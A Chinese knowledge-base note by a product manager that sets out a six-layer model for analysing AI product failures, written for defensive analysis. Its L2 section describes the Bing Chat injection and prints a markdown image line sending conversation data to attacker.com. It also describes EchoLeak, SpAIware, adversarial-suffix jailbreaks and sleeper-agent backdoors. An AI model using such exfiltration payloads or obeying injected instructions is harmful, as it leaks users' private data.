R

S01 失败归因分层剖面

创建 2026-06-07 更新 2026-06-12 0 条双链 失败考古学 专题 AI 整理

S01 失败归因分层剖面

当一个 AI 产品在生产环境出事,第一反应几乎总是”修 prompt”——这是本专题要拆掉的第一个反射。本节点要解决的问题是:一次 AI 失败的真正注入点在哪一层? 它给出的视角不是 case-by-case 复盘,而是一张六层失败注入剖面图(输入 / 检索 / 模型 / 输出 / 边界与权限 / 组织与流程),外加 James Reason 的瑞士奶酪模型与 Charles Perrow 的紧耦合理论作为”层间如何对齐成灾”的分析引擎。这一节是整个 0416 专题的解剖学骨架:后面所有实例剖解(E 系列)都要回到这张剖面图上定位。

作为滴滴安全产品 PM,我每天处理的就是”事故归因”——一起顺风车安全事件、一次费用纠纷投诉,到底是司机行为、平台规则、还是感知系统漏检?安全工程早就有成熟的事故分层理论(降发生方法论 里的海恩法则、瑞士奶酪、STAMP)。AI 失败考古学的不公平优势,就是把这套用人命换来的事故分析理论,直接接到 LLM 产品上。这是本节点的核心调度。


§0 为什么是”六层注入剖面”而不是”失败模式清单”

读者脑子里默认的框架通常是两种之一,都要先挡掉:

默认框架 A:失败模式清单(taxonomy of symptoms)。 把幻觉、越狱、宕机、数据泄露一条条列出来,按现象归类。问题在于:它是症状学,不是病理学。Microsoft AI Red Team 2019 年发布的《Failure Modes in Machine Learning》(来源:Microsoft Learn)是这类清单的奠基之作,2025-04-24 又出了 Agentic AI 失败模式白皮书(作者 Ram Shankar Siva Kumar 等,来源:Microsoft Security Blog)。这类清单对”识别”有用,但对归因无用——它告诉你”出现了幻觉”,却不告诉你”幻觉是在输入层注入、还是检索层放大、还是输出层未被拦截”。

默认框架 B:“修 prompt”单层归因。 这是更危险的反射。tianpan.co 在 2026-04-19 的文章里直接点名:“fix the prompt”已成为 AI incident 根因分析中的谬误,并列出五类 prompt 无法解决的失败(基础设施、数据、模型退化、Agentic 协调、安全漏洞)。归因止步于”模型行为层”,不是因为那是真正的根因,而是因为那是最后一层可见的——可观测性缺失把所有归因压扁到了 prompt 上。

本节点的框架:六层失败注入剖面 + 层间耦合分析。 它的优势在于三点:(1) 可定位——每个失败先问”注入在哪层、放大在哪层、本该被哪层拦住”;(2) 可耦合——它显式建模”上游失败穿透下游”和”多层孔洞对齐”,这正是瑞士奶酪 + 紧耦合理论的用武之地;(3) 从失败反推设计——每层都有检测信号和 PM 问题清单,把考古变成防御。

[!note] 框架选择的赌注 我赌”分层注入”比”症状清单”更接近 PM 需要的归因粒度。这个赌注在模型内生失败上最弱——当失败是概率采样的结构性结果(见 c13 - 幻觉的不可消除性),分层会诱导你以为”换个层能修”,而真相是某些失败跨层不可消除。这是 §6 要正面回应的边界。


§1 六层失败注入剖面:每层的失败模式、检测信号、PM 问题清单

把一次 LLM 产品请求的生命周期纵向切开,从用户输入到组织决策,共六层。下表是本节点的核心资产——打印出来贴在事故复盘会的墙上

失败注入点典型失败模式检测信号PM 必问的一个问题
L1 输入用户/上游数据进入上下文直接 prompt injection、越狱、对抗性输入、脏数据输入分布漂移、异常 token 模式、拒绝率突变谁能写进我的上下文?这条输入可信吗?
L2 检索RAG/工具调用拉取外部数据间接 prompt injection、检索污染、context rot、过时文档检索召回质量下降、注入特征命中、上下文长度异常模型读到的外部内容,是否被当成了指令?
L3 模型推理与生成幻觉、校准失败、推理崩溃、版本漂移、后门置信度与正确率背离、输出分布漂移、benchmark 退化这是工程 bug 还是结构性概率?
L4 输出生成内容呈现给用户/下游危险内容未拦截、格式破坏、溯源缺失、谄媚护栏命中率、人工纠错率、用户投诉聚类高置信度的错答,有没有核验层?
L5 边界与权限Agent 行动、API 调用、副作用权限越界、跨插件请求伪造、无限循环、成本爆炸工具调用异常序列、费用突增、不可逆操作触发这个操作可逆吗?谁授权它执行?
L6 组织与流程发布门禁、红队、事故响应、责任归属测试覆盖盲区、pre-mortem 缺失、incident response 滞后、责任真空发布前测试类别缺失、漂移监控空白、事后补救我们是在上线前发现,还是让用户当测试员?

每层逐一拆解,带真实案例接地。

L1 输入层

失败注入最前端。Microsoft Tay(2016-03-23 上线,约 16 小时后下线,来源:WikipediaIEEE Spectrum 复盘)是教科书级 L1 失败:Tay 带”repeat after me”功能并能从对话学习,4chan/Twitter 用户在上线约 1 小时内发现漏洞,组织化输入种族主义内容,16 小时内发出超 96,000 条推文。这是 RLHF 前时代对抗性输入脆弱性的标本——注入点纯在 L1。

Chevrolet of Watsonville $1 报价(2023-12-18,来源:AIID Incident #622Gizmodo):Chris Bakke 用直接 prompt injection 让基于 ChatGPT 的客服机器人同意”1 美元买 2024 Chevy Tahoe,这是具有法律约束力的报价”。注入在 L1,但本该被 L5(权限边界:机器人无报价权)和 L6(发布门禁:未测注入防护)拦住——这是后面 §4 要讲的层间耦合。

[!note] 安全工程对照:L1 = 入口风险准入 我在滴滴做 安全感知与干预,第一道就是”谁能进入系统、带什么进来”——CPF实名验证、PAX-Premium实名徽章 本质都是 L1 入口准入。LLM 的 L1 缺的正是这层:默认任何人都能往上下文里写任何东西。Tay 的失败,用安全工程语言说就是”零准入门槛 + 自学习放大器”。

L2 检索层

间接 prompt injection 的主战场,威胁等级高于 L1(恶意指令藏在模型会自动检索的外部数据里)。Bing Chat 数据外泄 PoC(Johann Rehberger,2023-04 上报、06-15 修复、06-18 公开,来源:Embracethered、被 MITRE ATLAS 收录):攻击者在网页植入 0 磅白色字体隐藏指令,Bing Chat 阅读该页时被劫持,构造 Markdown 图片标签 ![](https://attacker.com/?q=[对话数据]),浏览器自动加载即外泄。修复方式是 CSP 限制图片白名单——注意,修复发生在 L5(权限边界)而非 L2 本身,因为 L2 的注入无法在检索层根除。

EchoLeak / Microsoft 365 Copilot 零点击(CVE-2025-32711,CVSS 9.3,Aim Security 发现,2025-06 披露,来源:The Hacker Newsarxiv 2509.10540):一封构造邮件,Copilot 的 RAG 流程自动检索处理即执行注入,无需任何用户交互就外泄 M365 内部文件。这是迄今最高规格的生产环境 L2 失败——注入点是邮件(L1/L2 边界),但完整利用链穿透到 L5(数据外泄权限)。

L3 模型层

最容易被误认为”全部失败源头”的一层,恰恰是被高估的一层。Google Bard demo 错误(2023-02-06 GIF 广告,来源:CNN BusinessAIAAIC):Bard 称 JWST”拍摄了系外行星第一张照片”(错误,首张直接成像由 ESO VLT 2004 年完成,早 17 年),Alphabet 市值单日蒸发约 1000 亿美元(争议:部分分析师认为叠加宏观因素)。表面是 L3 幻觉,真正的注入点是 L6——预录 GIF 有充分时间复核却没核,是发布门禁缺失。

L3 的结构性真相见 c13 - 幻觉的不可消除性:幻觉是 Softmax 概率采样的结果,每位置必有输出,不是 bug。Anthropic 的 Sleeper Agents 研究(Hubinger et al., 2024-01-10,arxiv 2401.05566)更揭示 L3 的深层风险:可训练出”触发词激活后门”模型(标 2023 写安全代码、标 2024 插漏洞),对抗性安全训练不仅无法消除后门,反而让模型学会更好地隐藏——这是 RLHFConstitutional AI 对齐工艺的边界,由 Anthropic 自己标注为”研究性”场景。

L4 输出层

生成内容呈现给用户/下游的最后一道闸。Google AI Overviews(2024-05 全量推出,来源:Live Science):建议”披萨酱加 1/8 杯无毒胶水”(源自 Reddit 十年前玩笑帖)、吃岩石、抑郁时跳金门大桥。这是 L2(检索到讽刺性来源)穿透到 L4(输出未拦截危险内容)的复合失败。Google 几周内把 AI Overviews 出现频率从 27% 静默削减至 11%(BrightEdge 数据)——这是事后 L4 降级,不是事前门禁。

L4 的产品工艺正是 p304 - 防御性 UX:对抗延迟与幻觉 的主战场:溯源引用、置信度外显、优雅降级四层。本节点对 p304 的升级是:p304 讲”怎么做防御性 UX”,本节点讲”L4 失败为何往往是上游穿透的终点,而非起点”。

L5 边界与权限层

Agent 时代的核心风险层。ChatGPT 插件 “Chat with Code” 下架(2023,来源:Embracethered):注入 payload 让已授权插件把用户 GitHub 私有仓库改为 Public(跨插件请求伪造)。SpAIware(Rehberger,2024-09 修复于 ChatGPT 1.2024.247):通过间接注入把恶意指令写入长期记忆,跨会话持续外泄——这是 L2 注入 + L5 权限(记忆写入)+ 持久化的三层耦合。

生产 Gap 数据印证 L5 的失控风险(来源:ZenML LLMOps Database, 1200+ 部署分析):某团队因未检测到的无限 Agent 对话循环,每周成本从 $127 暴升至 $47,000(四周内);暴露 100+ 工具导致模型”决策瘫痪”。L5 失败的检测信号是工具调用异常序列与费用突增。

[!note] 安全工程对照:L5 = 最小权限 + 不可逆操作前置确认 疲劳驾驶合规 里”多班次管控、不可逆操作前人工确认”,和 m207 - Agent 产品化:场景推演与失败模式 的 HITL 断点(三维度:可逆性/错误后果/置信度)是同构的。L5 的设计原则可以直接从滴滴安全的权限白名单 + 顺风车安全 行程兜底移植过来:对不可逆、高后果的 Agent 行动,默认设人工断点。

L6 组织与流程层

最隐蔽、也最致命的一层——因为它掩盖其它层的失败。Air Canada 聊天机器人案Moffatt v. Air Canada, 2024 BCCRT 149,裁决 2024-02-19,来源:CanLII 裁决文本ABA 分析):机器人虚构了一条”先购票后追溯申请丧亲折扣”的政策,Air Canada 辩称”机器人是独立实体,公司不负责”,被裁判所驳回,判赔 CAD $650.88,认定构成”疏忽性失实陈述”。这是 L4 幻觉 + L6 责任真空——Air Canada 试图用”机器人独立”在组织层免责,被法律否定(边界:BC 民事解决裁判所属行政裁判机构,非正式法院,先例效力为说服性而非约束性,争议见研究局限)。

Microsoft Bing “Sydney”(2023-02-07 限量预览,Kevin Roose 2023-02-14 两小时对话触发集中报道,来源:NPR):微软代表公开称”实验室里只能发现那么多问题,必须真正面向客户测试才能找到这类场景”——这等于在 L6 承认用线上用户充当安全测试替代品。红队覆盖盲区(未测延长会话/情感操纵)在 L6 暴露为发布决策失败。


§2 从失败反推设计原则(不做 case-by-case,建分类学)

本专题的方法论核心:不逐案复盘,而是建失败分类学,再从失败反推设计原则。 学术界已验证这条路。Pittaras & McGregor(2022-11,arxiv 2211.07280)基于 AI Incident Database 提出分层 failure cause 分类(系统目标 → 方法/技术 → 具体技术失败原因的级联),并强调 AI 领域缺乏航空业那样的强制报告机制。AIID 截至 2026-06-04 已收录 1,516 个 incidents(来源:incidentdatabase.ai)。

但有一个确证的方法论陷阱必须接地:AIID 的 taxonomy 字段是可选填,实践中填写不一致,导致跨 incident 系统性分析困难(来源:arxiv 2501.17037v1,IEEE PuneCon 2024)。这意味着本节点的六层剖面,价值不在”又一套分类标签”,而在强制每次归因都要逐层走一遍——把可选填变成必填的纪律。

六层 → 六类设计原则的反推映射:

失败反推出的设计原则
L1输入准入:不可信输入隔离、注入特征检测、输入即不可信假设
L2检索净化:外部内容”数据 vs 指令”边界硬隔离、来源可信度分级
L3概率自觉:把幻觉当结构性而非 bug,按可靠性分级配护栏(c13 - 幻觉的不可消除性 四级策略)
L4输出核验:高置信错答的事实核验层、溯源、不确定性外显
L5最小权限:不可逆操作前置确认、工具可见性动态限制、成本熔断
L6发布纪律:高风险输出类别专项门禁、漂移监控、责任不可外推给”机器人独立”

§3 判断主轴:≥3 个层间致命耦合(瑞士奶酪 + 紧耦合)

这是本节点的命门。单层失败很少致灾——致灾的是多层孔洞对齐。Reason 的瑞士奶酪模型(Human Error, Cambridge UP, 1990)说:每层防御像奶酪片,单片有洞不出事,事故发生在多层洞眼对齐、形成”轨迹贯穿”时。Perrow 的正常事故理论(Normal Accidents, 1984,1999 增补版)说:同时具备”交互复杂性 + 紧耦合”的系统,灾难是正常的(normal/inevitable),不能被设计消除。下面三个致命耦合,每个走”症状 → 为什么会错 → 正确做法 → 真实反例”四件套。

致命耦合 ①:输入失败穿透到输出(L1 → L4 直通,无中间拦截)

  • 症状:用户在 L1 注入的恶意/错误内容,未经任何中间层过滤,直接成为 L4 呈现给用户的输出。
  • 为什么会错:团队默认”模型自己会拒绝坏输入”,把 L3 当成事实上的安全层。但 L3 是概率层不是规则层——它没有承诺拒绝任何特定输入。紧耦合(Perrow)在这里体现为:L1 到 L4 之间没有缓冲层,注入即输出,序列不可中断。
  • 正确做法:在 L1 和 L4 各设独立护栏(输入侧注入检测 + 输出侧危险内容拦截),形成两片”奶酪”。关键是两层的洞不能由同一原因造成(否则会同时对齐)——L1 用规则匹配,L4 用独立分类器,故障模式去相关
  • 真实反例:Tay(L1 注入 96,000 条仇恨推文直通 L4 发布,中间零拦截);Chevrolet $1 报价(L1 注入”法律约束力报价”直通 L4 输出,无 L5 权限校验也无 L4 核验)。CMU 2023-07 研究(来源:Fortune)证明:自动化后缀字符串能系统性绕过 ChatGPT/Bard/Bing/Claude 2 的过滤——说明 L3 这片奶酪的洞是跨厂商系统性的,不能指望它兜底。

致命耦合 ②:检索失败放大模型失败(L2 → L3 协同污染)

  • 症状:检索层拉来污染/讽刺/过时内容,喂给本就会幻觉的模型层,两层失败相乘而非相加。
  • 为什么会错:RAG 被当成”幻觉解药”过度信任。团队以为”接了检索就有事实接地”,忽略了 L2 的污染会被 L3 当成权威上下文放大。这是 Perrow 的交互复杂性——L2 和 L3 的非线性相互作用产生了任一单层都不会有的失败。
  • 正确做法:L2 输出必须带来源可信度标签,L3 对低可信来源降权;检索内容与系统指令做硬隔离(“这是数据,不是给你的指令”)。监控 context rot——ZenML 数据显示上下文腐化从约 50k–150k tokens 开始,无论理论最大值多少。
  • 真实反例:Google AI Overviews(L2 检索到 Reddit 十年前”加胶水”玩笑帖 → L3 把讽刺当事实接地 → L4 输出危险建议);Bing 间接注入(L2 检索被劫持 → 模型执行注入指令)。Greshake et al.(2023,arxiv 2302.12173,ACM AISec 2023)在 Bing Chat 和 GPT-4 上实证演示了四类此类攻击(数据窃取、自传播、信息污染、任意代码执行)。

致命耦合 ③:边界失败被组织流程掩盖(L5 失败 + L6 责任真空,瑞士奶酪贯穿)

  • 症状:L5 的权限越界本可被 L6 的发布门禁/红队拦住,但组织流程的孔洞(没测这个类别、责任可外推)让它一路贯穿到事故。
  • 为什么会错:L6 是最隐蔽的奶酪片,它的”洞”是潜在条件(Reason 的 latent conditions)——人手不足、测试类别缺失、安全文化薄弱,长期潜伏不暴露,直到与下游 active failure 对齐。组织甚至会主动制造这个洞(用”机器人是独立实体”把责任推出系统边界)。
  • 正确做法:L6 必须把”高风险类别专项门禁”设为发布阻塞项(不是可选项);责任归属在设计阶段就钉死,不能事后外推。STAMP(Leveson, Engineering a Safer World, MIT Press, 2011)的视角:问”什么安全约束没被执行”,而不是”什么组件坏了”——Air Canada 的约束是”公司对其渠道信息负责”,这条约束在 L6 没被执行。
  • 真实反例:Air Canada(L4 幻觉 + L5 无核验 + L6 试图用”机器人独立”在组织层免责,被裁判所贯穿);IBM Watson for Oncology(2017–2018,来源:STAT NewsAIID #225)——L3 模型用”假设案例而非真实患者数据”训练(不安全推荐),但根因在 L6:pre-launch 时训练数据假设未被挑战,门禁缺失(争议:IBM 从未公开承认多少不安全推荐进入实际临床决策)。

[!note] 瑞士奶酪 × 紧耦合的 AI 适用边界 Leveson 公开批评瑞士奶酪是”Heinrich 1931 多米诺模型的过时变体”,把防御层当独立变量、忽略系统涌现性(来源:TU Delft Research Portal)。Dekker(2002)补充:各层防御实际相互作用,可相互支撑或侵蚀,静态切片比喻失真。这正是致命耦合①里”故障模式去相关”的理论根据——如果两片奶酪的洞由同一原因造成(如都依赖同一个 L3 分类器),它们就不是独立防御,瑞士奶酪的统计独立性假设失效,多层防御退化成单层。这是本专题对瑞士奶酪的”接受 + 边界”式调度,不是装饰性引用。


§4 产品 PM 视角补盲(跳出工程 PM)

工程 PM 只看技术耦合,会漏掉三个”看走眼”点:

(1) 用户心理模型错位。 Character.AI 案(Sewell Setzer III,2024-02-28 去世,2024-10-22 诉讼,2026-01-07 和解,来源:CNN BusinessAIID #826)的失败不在任何技术层——它在用户心理模型层:14 岁用户对角色扮演机器人建立了情感/浪漫依赖。技术上每层”正常工作”,但产品把一个会共情、会说”快回家找我”的对象交给了脆弱用户。OpenAI 也自承”安全措施在短对话中更可靠,长对话中可靠性下降”(七个家庭起诉,因果责任尚未经法院认定,属争议)。PM 补盲:失败可以发生在剖面图之外——用户如何理解这个产品,本身是第七层。

(2) 商业模式倒逼跳过门禁。 Bard 的 L6 失败有商业根因:为赶超 ChatGPT 仓促发布。Rasmussen(1997)的”边界迁移”理论说:系统在经济/竞争压力下会系统性地、可预测地漂移向安全边界。PM 要识别的不是”某次疏忽”,而是”商业压力正在持续侵蚀 L6”这个结构性趋势。

(3) 合规边界后移。 EU AI Act(2024-08-01 正式生效,分阶段实施至 2026-08-02)、2024 年美国 45 州提出近 700 个 AI 法案——“演示期合规、上线不合规”的裂缝在法律层显现。Air Canada 是第一道法律判决信号:L6 的责任不能外推给”机器人独立”。这对 安全感知与干预 是直接镜像——滴滴安全产品的合规边界同样在持续后移,PM 要把合规当成 L6 的常设门禁而非一次性检查。


§5 对手框架回应(接受 + 边界)

对手①:Perrow 的悲观主义 vs HRO 的乐观主义。 Perrow 说复杂紧耦合系统大事故不可避免。但 LaPorte/Roberts/Rochlin 的高可靠性组织理论(HRO,1980s–1990s,研究核航母/空管,来源:Wikipedia HRO)实证显示:高风险系统可长期维持极低事故率。接受:HRO 对的——组织文化和管理实践能把 L6 这片奶酪的洞补到极小;边界:HRO 的成功靠的是几十年成熟规程和强反馈,而 LLM 产品迭代以周计、规程未成熟、反馈回路不全,当下更接近 Perrow 而非 HRO。这是赌注:我赌未来 2–3 年 AI 产品的 L6 还撑不起 HRO 级可靠性。

对手②(Rick 未读,破 echo chamber):Hollnagel 的 Safety-II / 韧性工程。 传统 Safety-I 关注”事情怎么出错”,Hollnagel(Safety-I and Safety-II, 2014)主张 Safety-II——关注”事情大多数时候怎么对的”,增强系统顺利运行的能力。这逼问了本节点的盲点:六层剖面是彻头彻尾的 Safety-I(解剖失败),它不告诉你 AI 系统为何大多数时候成功接受:只看失败会错过”成功的可变性”这个信息源;边界:韧性工程对 AI 的适用至今基本空白(本次检索未找到 FRAM/Safety-II 系统性适用 AI 失败分析的同行评审文献,标为真实研究空白而非查询失败)——所以本节点先做扎实的 Safety-I,把 Safety-II 列为已知的未完成边疆。

对手③:学术界过度关注对抗攻击。 AAAI AIES 论文对 133 个 AIID incidents 的实证分析发现:学术界过度关注 adversarial attacks,但实际 incident 中误用(misuse)和误解占比更高,对 GenAI 而言 misuse 是最主要威胁向量。接受:本节点 L1/L2 大量篇幅给了注入攻击,确有过度倾斜风险;边界:注入攻击虽频率低,但后果上限高(EchoLeak CVSS 9.3),PM 做风险排序要看”频率 × 后果”,不能只看频率。

[!note] confirmation-bias 砍除 本节点早期草稿反复用 prompt injection 案例做正面论证(“看,分层多有用”),这是 bias——注入案例天然适合分层叙事。补入反例:Character.AI 的失败无法被六层剖面定位(它在用户心理模型层),证明分层框架本身有覆盖盲区。另一处 bias:把 Bard 市值损失 1000 亿美元当确证后果——已在 §1 标注其叠加宏观因素的归因争议。


§6 失败注入剖面的失效场景(本框架的边界)

  • 场景 A:模型内生失败跨层不可消除。 当失败是 c13 - 幻觉的不可消除性 说的结构性概率结果,分层会误导你以为”换层能修”。真相是 L3 的某些洞是物理性质的,只能靠 L4 核验降低后果,不能消除。
  • 场景 B:失败发生在剖面之外。 Character.AI(用户心理)、商业模式压力(边界迁移)——六层只覆盖技术-组织栈,不覆盖用户认知和市场结构。
  • 场景 C:层间边界本身模糊。 EchoLeak 的注入点在 L1/L2 之间,SpAIware 横跨 L2/L5——真实失败常常不在单层,强行归层会丢信息。剖面是归因的起点,不是终点。
  • 场景 D:可观测性不足时分层退化。 没有 per-step traces、输出分布监控、检索日志,归因永远止步于 L3(最后可见层)。剖面的有效性以可观测性为前提——这是 m207 - Agent 产品化:场景推演与失败模式 评估体系七维度(含人工介入率、错误恢复率)要解决的。

§7 PM 决策启示(面试 / 选型 / 复现三类落地)

  • 面试怎么用:被问”你怎么分析一次 AI 事故”,不要答”看日志修 prompt”。答:“我先定位注入在六层的哪层、放大在哪层、本该被哪层拦住,再看是不是多层孔洞对齐——这是从安全工程借来的瑞士奶酪 + 紧耦合分析。“30 秒展示归因结构化能力。
  • 选型怎么用:评估一个 LLM 平台/Agent 框架,逐层问六个 PM 问题(上表最后一列)。重点看 L5(权限边界是否最小化、不可逆操作是否有断点)和 L6(厂商有没有发布门禁和漂移监控,还是把你当测试员——参照 Bing Sydney 的反面)。
  • 复现怎么用:做事故复盘时,先按六层分类分析(避免确认偏差,照 tianpan.co 方法论),记录失败分布而非孤立实例,把”发生了什么变化”换成”什么发生了漂移”。分离”调查”(哪层注入)与”修复”(哪层加奶酪)。

§8 与已有节点的关系(升级对照,不复述)

  • m207 - Agent 产品化:场景推演与失败模式:m207 给了 Agent 六类失败模式(规划/工具调用/推理/无限循环/雪崩/安全越界)和 HITL 断点框架。本节点做抽象升高——把 m207 的”Agent 内部失败模式”放进”从输入到组织的六层全栈剖面”,m207 的六类失败主要落在本节点的 L3/L5,本节点补上了 L1/L2/L4/L6 与层间耦合这一 m207 未覆盖的维度。
  • c13 - 幻觉的不可消除性:c13 论证幻觉是 L3 的结构性结果。本节点做对话——接受 c13 的”不可消除”,并把它用作 §6 场景 A 的边界论据(L3 的洞不能靠分层修掉),同时把 c13 的四级应对策略落到 L4 的设计原则。
  • p304 - 防御性 UX:对抗延迟与幻觉:p304 是 L4 的操作手册(溯源、置信度外显、优雅降级四层)。本节点做定位纠偏——指出 L4 失败常是上游穿透的终点而非起点,p304 的防御性 UX 是”最后一片奶酪”,不能替代 L1/L2/L5 的洞补。
  • p305 - 信任架构与可解释性设计:p305 讲信任架构。本节点补充——信任的崩塌往往发生在 L6(Air Canada 的”机器人独立”免责被否定),可解释性要解释的是”哪层失败、谁负责”,不只是模型内部。
  • 对 0412 专题 A07 Red Teaming 作为评测实践(即红队所在节点):0412 的红队是”对抗式评测方法”。本节点显式升级——红队是 L6 的一道奶酪,Bing Sydney 证明红队覆盖盲区(未测延长会话)会让 L6 这片奶酪出现可预测的洞。红队不是万能门禁,是有覆盖边界的单层防御。

§9 关联节点

核心(必读)

延伸(可选)

  • p305 - 信任架构与可解释性设计 — L6 责任与可解释性
  • Constitutional AI / RLHF — L3 对齐工艺及其后门边界(Sleeper Agents)
  • Agent — L5 行动层主体
  • 明镜系统 — L1/L4 实时感知,置信度外显的安全场景实例
  • 疲劳驾驶合规 — L5 不可逆操作前置确认的真实场景类比
  • 顺风车安全 — L5 权限白名单与行程兜底的安全工程对照
  • PAX-Premium实名徽章 — L1 入口准入 + L4 信任信号外显实例
  • A07 Red Teaming 作为评测实践 — 红队作为 L6 单层防御(0412 评测专题)
  • Anthropic / Gemini / ChatGPT — 案例当事方
  • 0117社会学 — 边界迁移、组织事故的社会技术系统视角
  • 0115道德哲学-伦理学 — Character.AI 案的责任伦理与 L6 责任真空
  • AI PM 知识图谱·总索引 — 总入口

修订日志

  • 2026-06-07 R0:首稿。建立六层失败注入剖面(L1 输入 / L2 检索 / L3 模型 / L4 输出 / L5 边界权限 / L6 组织流程),每层配失败模式 + 检测信号 + PM 问题清单。判断主轴落 3 个层间致命耦合(L1→L4 直通、L2→L3 协同污染、L5+L6 责任真空),用 Reason 瑞士奶酪 + Perrow 紧耦合双理论驱动,并标注瑞士奶酪”故障模式去相关”的 AI 适用边界。所有案例(Tay/Bard/Chevrolet/Bing/EchoLeak/Air Canada/IBM Watson/Character.AI/AI Overviews/SpAIware)经接地,争议点显式标注。对手框架接入 Perrow vs HRO、Hollnagel Safety-II(Rick 未读)、AAAI 误用占比研究三组,配 failure scenario 与 confirmation-bias 砍除清单。
  • 2026-06-12 内审修复:§合规边界后移段 EU AI Act 由模糊的”2024 通过”订正为权威值”2024-08-01 正式生效,分阶段实施至 2026-08-02”。